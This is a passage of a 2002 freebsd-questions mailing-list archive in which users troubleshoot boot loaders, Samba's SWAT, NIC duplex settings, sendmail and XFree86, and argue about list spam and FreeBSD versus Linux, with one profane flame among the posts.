freebsd-questions@freebsd.org Received: from ns1.infowest.com (ns1.infowest.com [204.17.177.10]) by hub.freebsd.org (Postfix) with ESMTP id 1C92937B400 for ; Wed, 26 Jun 2002 01:08:33 -0700 (PDT) Received: from Presarionb (208.186.110.66.bluegill.infowest.net [208.186.110.66]) by ns1.infowest.com (Postfix) with SMTP id 1D68D2232C; Wed, 26 Jun 2002 01:13:46 -0600 (MDT) From: Lorin Lund To: "freeBSD" , "Thomas Widlundh" Date: Wed, 26 Jun 2002 01:06:30 -0600 X-Priority: 3 (Normal) In-Reply-To: <002501c21c93$3abfe520$04056dd4@chappe2> Message-Id: <04069371ZAA62XQPPJB9L54ML53KE.3d1967f6@Presarionb> Subject: Re: Lilo question MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-Mailer: Opera 6.01 build 1041 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I suppose you are referring to the multi-boot loader that is available with FreeBSD install. It isn't called Lilo but it can load slackware off of your second disk. You should see a menu listing F1 for your first bootable partition, F2 for your second bootable partition (on disk 1) ... and F5 to look at your second drive. You can use the multi-boot loader that comes with FreeBSD or you can use Lilo. I'm sure either one will work. 6/25/2002 3:56:18 PM, "Thomas Widlundh" wrote: >Hi, >On my machine I have freeBSD on the first HDD and Slackware on the >second. >Can I somehow make the BSD Lilo to start the Slackware on disk 2 >(/dec/hdb)? >Should I let Slackware install its own lilo? >Ideas? >Thanks, >Thomas > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 1:21: 7 2002 Delivered-To: freebsd-questions@freebsd.org Received: from vir.tninet.se (vir.tninet.se [195.100.94.108]) by hub.freebsd.org (Postfix) with ESMTP id C517637B403 for ; Wed, 26 Jun 2002 01:21:01 -0700 (PDT) Received: from pcmarpxy.tninet.se (bb-62-5-36-29.bb.tninet.se [62.5.36.29]) by vir.tninet.se (BMR ErlangTM/OTP 3.0) with ESMTP id 768218.75661.1025.1s71648123vir ; Wed, 26 Jun 2002 09:14:21 +0200 Content-Type: text/plain; charset="iso-8859-1" From: Mark Rowlands To: Steven Goodwin Subject: Re: SWAT/SAMBA problems Date: Wed, 26 Jun 2002 09:14:21 +0200 User-Agent: KMail/1.4.1 Cc: freebsd-questions@FreeBSD.ORG References: <1025027639.14959.7.camel@borges.codysbooks.com> In-Reply-To: <1025027639.14959.7.camel@borges.codysbooks.com> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206260914.21268.mark.rowlands@minmail.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tuesday 25 June 2002 7:53 pm, Scott Reese wrote: > On Mon, 2002-06-24 at 19:24, Steven Goodwin wrote: > > On 24 Jun 2002, Scott Reese wrote: > > > After successfully building and installing Samba 3.0 alpha-17 on my > > > 4.6-RELEASE box, I have found that Swat does not work for some stra= nge > > > reason. I uncommented the swat line in /etc/inetd.conf, checked to > > > make sure the service was listed in /etc/services (which it was) an= d > > > then I HUP'd inetd and I still cannot connect to Swat. I've tried > > > using 'http://localhost:901' as well as 'http://my.ip.address:901' = and > > > neither worked. This condition persisted after a reboot as well. > > > > It shouldn't require any rebooting on FreeBSD's side of things althou= gh > > rebooting windows often works ;-) If your browser is using a http pr= oxy, > > disable it (on your browser) and try again. > > I only mentioned the rebooting as an additional data-point in case > anyone was interested. I am aware that rebooting is not necessary, I > just happened to need to in order to use the other OS on my machine for > a bit. I am not using an http proxy of any sort. I checked the > preferences in Mozilla and it's set to "direct connection to the > internet." Thank you for the suggestion, though. > > Any other ideas? I have this same setup on another 4.6-RELEASE box at > home and it works flawlessly...I'm not sure what's different here... > check that the line in inetd.conf is pointing at the right binary,=20 run netstat -an | grep LISTEN ......and check for 901. try telnet yourhost 901... (to rule out browser issues) > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 1:24:54 2002 Delivered-To: freebsd-questions@freebsd.org Received: from server.rucus.ru.ac.za (server.rucus.ru.ac.za [146.231.115.1]) by hub.freebsd.org (Postfix) with SMTP id CD6E637B401 for ; Wed, 26 Jun 2002 01:24:47 -0700 (PDT) Received: (qmail 7958 invoked from network); 26 Jun 2002 08:24:45 -0000 Received: from shell-fxp1.rucus.ru.ac.za (HELO shell.rucus.ru.ac.za) (10.0.0.1) by server.rucus.ru.ac.za with SMTP; 26 Jun 2002 08:24:45 -0000 Received: (qmail 59741 invoked by uid 10032); 26 Jun 2002 08:24:45 -0000 Date: Wed, 26 Jun 2002 10:24:45 +0200 From: =?iso-8859-1?Q?David_Sieb=F6rger?= To: Mindaugas Cc: questions@FreeBSD.ORG Subject: Re: question about FTP Message-ID: <20020626102445.A59390@rucus.ru.ac.za> References: <458423822.20020626014640@delfi.lt> <20020625205733.K403-100000@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020625205733.K403-100000@localhost>; from fgleiser@cactus.fi.uba.ar on Tue, Jun 25, 2002 at 09:00:11PM -0300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue 2002-06-25 (21:00), Fernando Gleiser wrote: > On Wed, 26 Jun 2002, Mindaugas wrote: > > My computer is connected: WinBOX<--->10MB hub<-->FreeBSDBox > > But the speed when I uploading to anon ftp is 60 - 90 kbps and when > > I downloading from my ftp speed is 1 - 15 kbps and it seems > > sometimes it hangs up. > > I may be your network interface configuration. Plese post the output of > a 'ifconfig -a'. Some cards are known to have problems with autoselect > media. Try seting that options manually Of which, the Realtek 8139s are some of the worst. I've experienced just this problem with them on a number of occasions. For me, running "ifconfig rl0 media 10baseT/UTP" to force the card to 10Mbps half-duplex fixed the problem. To make the change permanent, add "media 10baseT/UTP" to your ifconfig_rl0 line in rc.conf. -- David Siebörger drs@rucus.ru.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 1:26:26 2002 Delivered-To: freebsd-questions@freebsd.org Received: from sheridan.tninet.se (sheridan.tninet.se [195.100.94.102]) by hub.freebsd.org (Postfix) with ESMTP id C96B137B400 for ; Wed, 26 Jun 2002 01:26:20 -0700 (PDT) Received: from pcmarpxy.tninet.se (bb-62-5-36-29.bb.tninet.se [62.5.36.29]) by sheridan.tninet.se (BMR ErlangTM/OTP 3.0) with ESMTP id 119292.76155.1025.0s5246801sheridan ; Wed, 26 Jun 2002 09:22:35 +0200 Content-Type: text/plain; charset="iso-8859-1" From: Mark Rowlands To: pjklist@ekahuna.com, questions@FreeBSD.ORG Subject: Re: I hate to bring it up again (spamming) Date: Wed, 26 Jun 2002 09:22:34 +0200 User-Agent: KMail/1.4.1 References: <20020625230039020.AAA766@empty1.ekahuna.com@pc02.ekahuna.com> In-Reply-To: <20020625230039020.AAA766@empty1.ekahuna.com@pc02.ekahuna.com> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206260922.34870.mark.rowlands@minmail.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wednesday 26 June 2002 1:00 am, Philip J. Koenig wrote: > > > As a side comment, even without Edwin, I've never been on a technic= al > > > list that got so much spam. > > > > > > ------------------------------------------------------------------- > > > DDDD David Kramer http://thekramers.net > > > > Well luser, newbie or just plain stupid, why don't the admins here bl= ock > > his IP till he gets a clue? > > > > Just my .02 > > > > Beech > > I have emailed the freebsd postmaster/list administrator about this > problem. The ball is in their court. > > As pointed out before, the problem is exacerbated by the unusual > scenario of 1) not requiring membership to post and 2) not blocking > file attachments by default. > > > Phil I rather think the presumption is that if your are smart enough to subscr= ibe=20 to freebsd-questions, you're smart enough to employ some local method to = deal=20 with spam. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 1:31: 7 2002 Delivered-To: freebsd-questions@freebsd.org Received: from matrix.zssm.zp.ua (matrix.zssm.zp.ua [212.8.32.10]) by hub.freebsd.org (Postfix) with ESMTP id 0F14D37B403 for ; Wed, 26 Jun 2002 01:31:00 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by matrix.zssm.zp.ua (8.11.3/8.11.3) with ESMTP id g5Q8MWo82191; Wed, 26 Jun 2002 11:22:34 +0300 (EEST) (envelope-from stalker@hermes-comp.zp.ua) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id BB0DA38302; Wed, 26 Jun 2002 11:29:47 +0300 (EEST) Date: Wed, 26 Jun 2002 11:29:47 +0300 (EEST) From: Alexander V Zubchenko To: Qingjia Zhu Cc: Subject: Re: sendmail refuse localhost? In-Reply-To: <20020626075748.22097.qmail@web14408.mail.yahoo.com> Message-ID: <20020626110835.L12722-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, Qingjia! On Wed, 26 Jun 2002, Qingjia Zhu wrote: > Hi, Alexander > > /etc/mail/sendmail.cf is by default: > Cwlocalhost > Fw-o/etc/mail/local-host-names > > I create /etc/mail/local-host-names and add > localhost > localhost.headsun.net Also want to notate: in prev. mail in second case (with 'mail' MUA) clearly two moments: a) mailer is relay (not local) b) this may b just mistype in letter, not in real output, but there r relay=localhost.heasun.net not headsun.net Also i'm not sured it is correct 'Cwlocalhost'. Try to change it to real host name or domainname. Other ideas some later...:) With best wishes, Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 1:49:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 9A03437B409 for ; Wed, 26 Jun 2002 01:48:54 -0700 (PDT) Received: from rambo.simx.org (62-59.twenty4help.se [62.20.102.59] (may be forged)) by maile.telia.com (8.11.6/8.11.6) with ESMTP id g5Q8mlL07961; Wed, 26 Jun 2002 10:48:47 +0200 (CEST) Message-ID: <3D198036.7020409@rambo.simx.org> Date: Wed, 26 Jun 2002 10:49:58 +0200 From: "Roger 'Rocky' Vetterberg" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: David Kramer Cc: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG David Kramer wrote: > On Tue, 25 Jun 2002, Roger 'Rocky' Vetterberg wrote: >> >>This is of course a question of personal taste, but I would >>probably choose FreeBSD. On small or medium size networks and on >>x86 hardware I find it hard to beat fbsd's performance. >>Linux is gaining performance wise, they have made some >>significant improvements lately, but Linux still gives me an icky >>feeling. I just cant sleep well at night if I have to trust Linux >>to run my servers. > > > I'm curious about this. Performance is something that can be measured, > but what about Linux makes you feel "icky"? > > I ask, because I'm going to be building a new server at home in a few > weeks (firewall/ipmasq/web/mail/ftp/ssh/couple users). I'm a long-time > Linux user, but now I'm using FreeBSD a lot from work. I've been > considering using FreeBSD instead of Linux for the new server, but I'm > having trouble finding *recent* *objective* advantages to one over the > other. For instance, I know the FreeBSD TCP/IP stack was much tighter and > more secure in the past, but I don't know if that's still the case. > > So I would be interested in hearing any objective advantages of FreeBSD > over Linux. > *snip* I suspected this would start one of those thread that never dies, thats why I clearly stated that it was only my personal opinion. First, let me assure you that Im not one of the zealots that only has eyes for one os and all other software is inferior to their favorite. I frequently use all versions of Windows and every MacOS from early 8.x up to MacOS X. I was involved with starting swedens first linux tech support and from that gained several months of linux training and a lot of trouble shooting experience. I have used linux for years, mixed with BSD, Windows, BeOS and Mac. The things I dont like about linux is the madness of libc and dependencies, rpm's, the different distributions that all seem to have their own idea about what path to follow, and the enormous hype that follows it. People that know nothing about computers still know the word linux. They may have a totally screwed idea about what it really is, but they know its something really cool and advanced and that you can make millions on dollars in profit if you use it. *sigh* Dont get me wrong, I like linux, its a great os. All Im saying is that I prefer BSD on my servers. Im not saying BSD is better or that linux cant run my servers just as well, I just personally feel more comfortable with BSD. It might be my personality that is screwed just as well as it could be linux thats bad. Now could this thread die, it answers very few BSD related questions. -- R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 1:49:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from patriarch.dnsalias.org (adsl-66-140-18-199.dsl.hstntx.swbell.net [66.140.18.199]) by hub.freebsd.org (Postfix) with ESMTP id 7859037B437 for ; Wed, 26 Jun 2002 01:49:00 -0700 (PDT) Received: from compgeek ([127.0.0.1]) by patriarch.dnsalias.org with Microsoft SMTPSVC(5.0.2195.4905); Wed, 26 Jun 2002 03:49:04 -0500 Reply-To: From: "Jon Noack" To: =?iso-8859-1?Q?David_Sieb=F6rger?= , "Mindaugas" Cc: Subject: RE: question about FTP Date: Wed, 26 Jun 2002 03:49:04 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20020626102445.A59390@rucus.ru.ac.za> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-OriginalArrivalTime: 26 Jun 2002 08:49:04.0984 (UTC) FILETIME=[5394A580:01C21CEE] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Of which, the Realtek 8139s are some of the worst. I've experienced > just this problem with them on a number of occasions. I've experienced this with 3Com and Intel cards as well. I traced it to a Kingston switch and (in another situation) a Linksys switch, both of which were supposed to be 10/100 autosensing switches. > For me, running "ifconfig rl0 media 10baseT/UTP" to force the card to > 10Mbps half-duplex fixed the problem. To make the change permanent, > add "media 10baseT/UTP" to your ifconfig_rl0 line in rc.conf. This worked in both situations, but changing out the switch (sometimes for another of the same brand but different model) solved the problem as well. You get what you pay for... Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 2: 8: 6 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id BCAE137B400 for ; Wed, 26 Jun 2002 02:07:50 -0700 (PDT) Received: from unixhideout.com (webserver@localhost.unixhideout.com [127.0.0.1]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5Q97XQ9049394; Wed, 26 Jun 2002 05:07:36 -0400 (EDT) (envelope-from ro0t@unixhideout.com) From: Network Administrator Received: from 192.168.1.10 (SquirrelMail authenticated user ro0t) by email.unixhideout.com with HTTP; Wed, 26 Jun 2002 05:07:42 -0400 (EDT) Message-ID: <1752.192.168.1.10.1025082462.squirrel@email.unixhideout.com> Date: Wed, 26 Jun 2002 05:07:42 -0400 (EDT) Subject: Re: I hate to bring it up again (spamming) To: , In-Reply-To: <3D198110.5EFFC0B4@xenya.si> References: <3D198110.5EFFC0B4@xenya.si> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal X-Mailer: SquirrelMail (version 1.2.6) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Can you please send as normal user and not as root ? > > Read RFC's. > > Thanks > > 24 hours on this list is enough for me, im unsubscribing. wtf do you care about my email for? What business is it of yours? this fucking list is like a big soap opera. All you skirts with nothing better to do but flame and poke and prod at people. I got goofball #1 over here trying to send me viruses, everyone else on the list sticks up for him, and calls him the victim and flames me because im the only one who has the balls to do something about him, and i got you poking at my email. who cares if i use root. Try and exploit something see what happens to your lan. fucking christ leave me alone. ----------------------------------------- Get your free email at www.unixhideout.com today. "http://www.unixhideout.com" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 2:16: 6 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx0.gmx.net (mx0.gmx.net [213.165.64.100]) by hub.freebsd.org (Postfix) with SMTP id 69BB237B400 for ; Wed, 26 Jun 2002 02:16:00 -0700 (PDT) Received: (qmail 32108 invoked by uid 0); 26 Jun 2002 09:15:58 -0000 Date: Wed, 26 Jun 2002 11:15:58 +0200 (MEST) From: Sanjay Bhattacharya To: freebsd-questions@freebsd.org MIME-Version: 1.0 Subject: Clarification X-Priority: 3 (Normal) X-Authenticated-Sender: #0014812425@gmx.net X-Authenticated-IP: [203.197.117.162] Message-ID: <20226.1025082958@www52.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Let me clarify something. I am not a sales man trying to sell Linux. Neither I am trying to bash freebsd. I thought such a post might be appropriate when I saw some posting which are very anti Linux. But I do apologize for starting a war thats a taboo on a technical list like this. But I refrain from apologizing to all those people who harbors the idea that I've offended them which I never did anyway. It's what I call, a baseless accusation, spewing venom for reasons which are totally unknown to me. Regards, Sanjay P.S. I really don't want this post of mine to become a big issue again. If any of you have any problems with this post, I'll be enchanted if you take the trouble of mailing me and not to the list. -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 3: 7:23 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.ettnet.se (mail.ettnet.se [212.109.4.7]) by hub.freebsd.org (Postfix) with SMTP id 4CE2437B406 for ; Wed, 26 Jun 2002 03:07:14 -0700 (PDT) Received: (qmail 49916 invoked by uid 0); 26 Jun 2002 10:07:12 -0000 Received: from unknown (HELO chappe2) (212.109.5.52) by mail.ettnet.se with SMTP; 26 Jun 2002 10:07:12 -0000 Message-ID: <000201c21cf9$3e3e7430$34056dd4@chappe2> From: "Thomas Widlundh" To: "freeBSD" Subject: XFree86 Date: Wed, 26 Jun 2002 11:59:40 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, This might be a little off topic on this list, but... Is the XF86Config file interchangeable between different types of Unix/Linux OS's? I have FreeBSD 4.5 with XFree86 3.3.6 and startx works as inspected. I have Slackware 8.0 on the second HDD with exactly the same version of XFree86 3.3.6, but this will not start at all. And this on the very same machine. Can I just copy the BSD XF86Config file into Slackware? The file is plain text and XFree86 is not an OS, it's a tool for many Unix type OS's. Am I thinking in the wrong direction here? As I wrote above, this is a BSD list, but I hope someone have some experiences to share. Thanks, Thomas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 3: 7:32 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.ettnet.se (mail.ettnet.se [212.109.4.7]) by hub.freebsd.org (Postfix) with SMTP id 281AE37B400 for ; Wed, 26 Jun 2002 03:07:14 -0700 (PDT) Received: (qmail 49910 invoked by uid 0); 26 Jun 2002 10:07:11 -0000 Received: from unknown (HELO chappe2) (212.109.5.52) by mail.ettnet.se with SMTP; 26 Jun 2002 10:07:11 -0000 Message-ID: <000101c21cf9$3d6f1640$34056dd4@chappe2> From: "Thomas Widlundh" To: "Lorin Lund" Cc: "freeBSD" References: <04069371ZAA62XQPPJB9L54ML53KE.3d1967f6@Presarionb> Subject: Re: Lilo question Date: Wed, 26 Jun 2002 11:50:24 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG >I suppose you are referring to the multi-boot loader that is >available with FreeBSD install. It isn't called Lilo but it >can load slackware off of your second disk. > >You should see a menu listing F1 for your first bootable partition, >F2 for your second bootable partition (on disk 1) ... and F5 to >look at your second drive. > >You can use the multi-boot loader that comes with FreeBSD or >you can use Lilo. I'm sure either one will work. > Hi again, Earlier, with only one HDD and freeBSD only, I had this F1 showing up. But now, after having added a second HDD, there is no F1 at all. The loader just starts with some text about the loader itself, and finally there is a prompt. Now I boot Slackware on the second HDD by a diskette, but I think it would be nice to be able to choose the OS I want to boot in the loader menu. But how am I achieving this? I've read about boot, loader, loader.conf, but I'm not able to figure it out. 6/25/2002 3:56:18 PM, "Thomas Widlundh" wrote: >>On my machine I have freeBSD on the first HDD and Slackware on the >>second. >>Can I somehow make the BSD Lilo to start the Slackware on disk 2 >>(/dec/hdb)? >>Should I let Slackware install its own lilo? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 3:12: 6 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id E54B737B401 for ; Wed, 26 Jun 2002 03:11:59 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com; Wed, 26 Jun 2002 03:11:56 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: Mark Rowlands Date: Wed, 26 Jun 2002 03:11:58 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: I hate to bring it up again (spamming) Reply-To: pjklist@ekahuna.com Cc: questions@FreeBSD.ORG References: <20020625230039020.AAA766@empty1.ekahuna.com@pc02.ekahuna.com> In-reply-to: <200206260922.34870.mark.rowlands@minmail.net> X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020626101156585.AAA781@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 26 Jun 2002, at 9:22, Mark Rowlands boldly uttered: > On Wednesday 26 June 2002 1:00 am, Philip J. Koenig wrote: > > > > As a side comment, even without Edwin, I've never been on a technical > > > > list that got so much spam. > > > > > > > > ------------------------------------------------------------------- > > > > DDDD David Kramer http://thekramers.net > > > > > > Well luser, newbie or just plain stupid, why don't the admins here block > > > his IP till he gets a clue? > > > > > > Just my .02 > > > > > > Beech > > > > I have emailed the freebsd postmaster/list administrator about this > > problem. The ball is in their court. > > > > As pointed out before, the problem is exacerbated by the unusual > > scenario of 1) not requiring membership to post and 2) not blocking > > file attachments by default. > > > > > > Phil > > I rather think the presumption is that if your are smart enough to subscribe > to freebsd-questions, you're smart enough to employ some local method to deal > with spam. :-) Actually you are making some incorrect assumptions, ie that everyone is receiving individual messages, not digests. (I almost always subscribe to list digests rather than individual messages) When you receive digests, you can't block individual messages. The list messages themselves come from a 'trusted' site. You can't use RBL-type systems on them for that reason. You can't test message headers. You can't block specific attachments. You can't use MUA- side filtering because the digests are monolithic. Bottom line is, when the digests are 95% spam, there is no other choice but to have to wade through the crap to find something useful. (then there is the case of people in various parts of the world who pay by the byte to download this stuff) It's time to stop blaming the victim. I DO NOT have this problem with other lists I'm on, and several others have pointed out the same thing. I understand there may be limited human or hardware resources, but several people have indicated they are willing to contribute in that respect. We are not all just sitting here complaining and not offering to help. (I will reiterate the suggestions people have made that those who wish to contribute in this regard contact the appropriate parties directly. I have done that.) -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 3:18: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp04.wxs.nl (smtp04.wxs.nl [195.121.6.59]) by hub.freebsd.org (Postfix) with ESMTP id 3BF0037B406 for ; Wed, 26 Jun 2002 03:17:58 -0700 (PDT) Received: from alex.kruijff ([213.10.151.186]) by smtp04.wxs.nl (Netscape Messaging Server 4.15) with ESMTP id GYB5XQ00.DFO; Wed, 26 Jun 2002 12:17:50 +0200 Date: Wed, 26 Jun 2002 12:18:36 +0200 From: Alex X-Mailer: The Bat! (v1.53d) Reply-To: freebsd-reply@akruijff.dds.nl X-Priority: 3 (Normal) Message-ID: <1801994628.20020626121836@dds.nl> To: Lenderman22@aol.com Cc: questions@FreeBSD.org Subject: Re: how to get FreeBSD [was: help!] In-Reply-To: References: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Dear Lenderman22, Wednesday, June 26, 2002, 8:43:35 AM, you wrote: Lac> Hello, Lac> I am trying to install FreeBSD over the internet onto a pc and need some Lac> basic information of how to discover my own IP address, my ISPs IP address Lac> and their DNS . I understand I will need this before beginning my Lac> installation. As well, I do also need to know the "At commands" spoken of so Lac> that I may dial into the mirror site to begin this whole process. Hope you Lac> can help. Lac> Many thanks. Lac> Mark You can install FreeBSD in different ways. One is online install. You need to have a connection before you install. So you probably wan't to download the cd before you install. You can download this with ftp from ftp.freebsd.org (login anonymous) then go to the directory: /pub/FreeBSD/ISO-IMAGES-i386/4.6/ and download either disc1.iso. If you want to limit the donwload you could try mini.iso, but you miss out on a lot of stuf. Another option is to buy the cd. I looked around for a wail but i didn't find the site where you can buy these. -- Best regards, Alex The FreeBSD handbook www.freebsd.org/handbook To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 3:21:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from matrix.zssm.zp.ua (matrix.zssm.zp.ua [212.8.32.10]) by hub.freebsd.org (Postfix) with ESMTP id D8C9E37B400 for ; Wed, 26 Jun 2002 03:21:14 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by matrix.zssm.zp.ua (8.11.3/8.11.3) with ESMTP id g5QACbo82624; Wed, 26 Jun 2002 13:12:41 +0300 (EEST) (envelope-from stalker@hermes-comp.zp.ua) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id 2D8B538302; Wed, 26 Jun 2002 13:19:48 +0300 (EEST) Date: Wed, 26 Jun 2002 13:19:48 +0300 (EEST) From: Alexander V Zubchenko To: Thomas Widlundh Cc: freeBSD Subject: Re: XFree86 In-Reply-To: <000201c21cf9$3e3e7430$34056dd4@chappe2> Message-ID: <20020626131726.E14619-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) 